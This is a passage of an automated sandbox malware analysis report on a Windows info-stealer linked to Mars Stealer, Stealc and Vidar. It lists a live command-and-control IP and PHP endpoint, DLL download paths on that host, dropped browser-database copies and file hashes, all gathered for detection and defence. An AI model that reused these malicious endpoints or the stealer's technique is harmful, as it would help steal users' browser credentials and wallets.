http://23.88.106.134/6a9f8e2503d99c04.phpz	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe	aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.88.106.134/6a9f8e2503d99c04.php513e43049a24c4f8a56ff24fb86a0b	aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe	aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.88.106.134/6a9f8e2503d99c04.phpition:	aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	false	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.sqlite.org/copyright.html.	aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824142050.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://23.88.106.134y	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mozilla.com/en-US/blocklist/	aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://mozilla.org0/	freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://23.88.106.134/6a9f8e2503d99c04.phpdus.wallet	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	aspnet_regiis.exe, 00000002.00000003.1726461054.0000000022DDD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://23.88.106.134/566d6e1ec8db6394/freebl3.dllYW	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://23.88.106.134/6a9f8e2503d99c04.php)	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	false	URL Reputation: safe	unknown
http://23.88.106.134/6a9f8e2503d99c04.phpcS	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://23.88.106.134/566d6e1ec8db6394/freebl3.dlleV	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll3x	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://23.88.106.134	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll4	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org	ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	false	URL Reputation: safe	unknown
http://23.88.106.134/6a9f8e2503d99c04.php6	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.88.106.134	unknown	United States		18978	ENZUINC-US	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1454088
Start date and time:	2024-06-08 20:21:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/23@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 83 Number of non-executed functions: 224
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.88.106.134	s9hah1f8HP.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	23.88.106.134/6a9f8e2503d99c04.php
	w7kdnBzGat.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	23.88.106.134/c73eed764cc59dcb.php
	6tJtH22I7a.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc	Browse	23.88.106.134/c73eed764cc59dcb.php
	sSX92EpKXA.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	23.88.106.134/c73eed764cc59dcb.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ENZUINC-US	https://sydney-weekender1.myfreesites.net/	Get hash	malicious	Unknown	Browse	23.88.86.2
	Ep3pKtF7kg.elf	Get hash	malicious	Mirai	Browse	23.88.52.241
	s9hah1f8HP.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	23.88.106.134
	xVZShu82Pj.elf	Get hash	malicious	Mirai	Browse	104.202.16.197
	SecuriteInfo.com.Win32.Evo-gen.26431.15713.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc	Browse	23.88.106.134
	x86.elf	Get hash	malicious	Unknown	Browse	104.202.38.93
	https://www.ghanaweb.com	Get hash	malicious	Unknown	Browse	23.88.86.2
	http://palestinehelpcentre.blogspot.com/	Get hash	malicious	HTMLPhisher	Browse	23.88.86.2
	w7kdnBzGat.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	23.88.106.134
	C4zDQjrSzj.elf	Get hash	malicious	Unknown	Browse	104.202.16.149

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	SecuriteInfo.com.Win64.DropperX-gen.20168.7257.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, Vidar, zgRAT	Browse
	s9hah1f8HP.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	amm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	SecuriteInfo.com.Win64.Evo-gen.4435.12354.exe	Get hash	malicious	CryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse
	mTrrZgrKOj.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	n8IqmAD3Mh.exe	Get hash	malicious	CryptOne, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse

Created / dropped Files

C:\ProgramData\AFIIEBGCAAECBGCBGCBK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFIIEBGCAAECBGCBGCBKEHIJEB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFHJECAA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECAKKKKJDBKKFIEBKEHD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECAKKKKJDBKKFIEBKEHDGCAFCB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JEHIDHDAKJDHJKEBFIEHCAAEHD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJJJJDHI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SecuriteInfo.com.Win64.DropperX-gen.20168.7257.exe, Detection: malicious, Browse Filename: s9hah1f8HP.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: amm.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Evo-gen.4435.12354.exe, Detection: malicious, Browse Filename: mTrrZgrKOj.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: n8IqmAD3Mh.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.log

Download File

Process:	C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
